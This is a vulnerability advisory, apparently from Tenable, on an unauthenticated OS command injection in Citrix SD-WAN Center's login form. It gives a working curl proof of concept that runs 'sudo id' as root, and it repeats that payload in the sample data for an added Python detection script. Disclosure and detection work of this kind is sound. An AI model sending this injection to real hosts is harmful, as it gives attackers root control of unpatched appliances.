### Synopsis
While developing a Nessus plugin for CVE-2017-6316, Tenable found an unauthenticated remote operating system command injection vulnerability in Citrix SD-WAN Center 10.2.0.136.733315.
The vulnerability appears to be in /home/talariuser/www/app/Controller/UsersController.php. The controller performs insufficient validation of user-supplied data (the $username value from the login form). An unauthenticated remote attacker can use the following curl command to run arbitrary OS commands on the remote host:
```
curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'
```
With command output:
```
root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test
uid=0(root) gid=0(root) groups=0(root)
```
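As an added defensive example (not part of Tenable's advisory or the Citrix code), the following script flags login POST bodies whose `data[User][username]` field carries shell metacharacters, which is the shape of the request shown above. The field name comes from the advisory's curl command; the metacharacter set, the (path, body) request format and the sample requests are assumptions constructed for this example.

```python
# Added example: flag CakePHP-style login POSTs whose username field contains
# shell metacharacters. Not code from the advisory or from Citrix SD-WAN Center.
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Assumed set of characters that have no business in a username and that are
# characteristic of OS command injection (backtick, $(, pipe, semicolon, redirects).
SHELL_META = re.compile(r"[`|;&<>\n]|\$\(")

def extract_username(body: str) -> Optional[str]:
    """Return data[User][username] from a URL-encoded login body, if present."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("data[User][username]")
    return values[0] if values else None

def is_suspicious_login(path: str, body: str) -> bool:
    """True when a POST to /login carries shell metacharacters in the username."""
    if path.rstrip("/") != "/login":
        return False
    username = extract_username(body)
    return bool(username) and SHELL_META.search(username) is not None

def scan_requests(requests: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (path, decoded username) for every request flagged as suspicious."""
    hits = []
    for path, body in requests:
        if is_suspicious_login(path, body):
            hits.append((path, extract_username(body)))
    return hits

# Constructed sample requests: one benign login and one mirroring the advisory's
# request body (username wrapped in backticks).
SAMPLE_REQUESTS = [
    ("/login", "_method=POST&data%5BUser%5D%5Busername%5D=alice"
               "&data%5BUser%5D%5Bpassword%5D=hunter2"),
    ("/login", "_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60"
               "&data%5BUser%5D%5Bpassword%5D=my_password"
               "&data%5BUser%5D%5BsecPassword%5D=my_secPassword"),
]

if __name__ == "__main__":
    for path, username in scan_requests(SAMPLE_REQUESTS):
        print(f"suspicious login POST to {path}: username={username!r}")
```

In practice the request bodies would be fed from a reverse-proxy or WAF log that records POST parameters; a hit is a signal to correlate with the upgrade status of the SD-WAN Center host.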
### Solution
Upgrade NetScaler SD-WAN Center to 10.0.7 or newer. Upgrade Citrix SD-WAN Center to 10.2.1 or newer. Follow Citrix's security best practices to further enhance your security posture.
### Additional References
https://support.citrix.com/article/CTX247737
### Disclosure Timeline
* 01/28/19 - Vulnerability discovered.
* 02/07/19 - Tenable reported to secure@citrix.com via encrypted email. The 90-day disclosure deadline is May 9th.
* 02/08/19 - Citrix acknowledges and asks for Tenable's public key.
* 02/08/19 - Tenable sends a public key.
* 02/26/19 - Citrix acknowledges they've reproduced the vulnerability.
* 02/26/19 - Tenable thanks Citrix.
* 04/03/19 - Tenable asks Citrix for an update.
* 04/04/19 - Citrix indicates they are getting a CVE assigned and a bulletin ready. Asks Tenable who to credit.
* 04/04/19 - Tenable says "Tenable, Inc." and offers to assign the CVE.
* 04/08/19 - Citrix indicates April 10th is the disclosure date and notes they already have a CVE allocated.
* 04/08/19 - Tenable asks for a copy of the draft bulletin or CVE assignment.
* 04/08/19 - Citrix assigned CVE-2019-10883. Can't share bulletin.
* 04/08/19 - Tenable thanks Citrix.
* 04/10/19 - Citrix notifies Tenable of publication and thanks Tenable.
* 04/10/19 - Tenable thanks Citrix.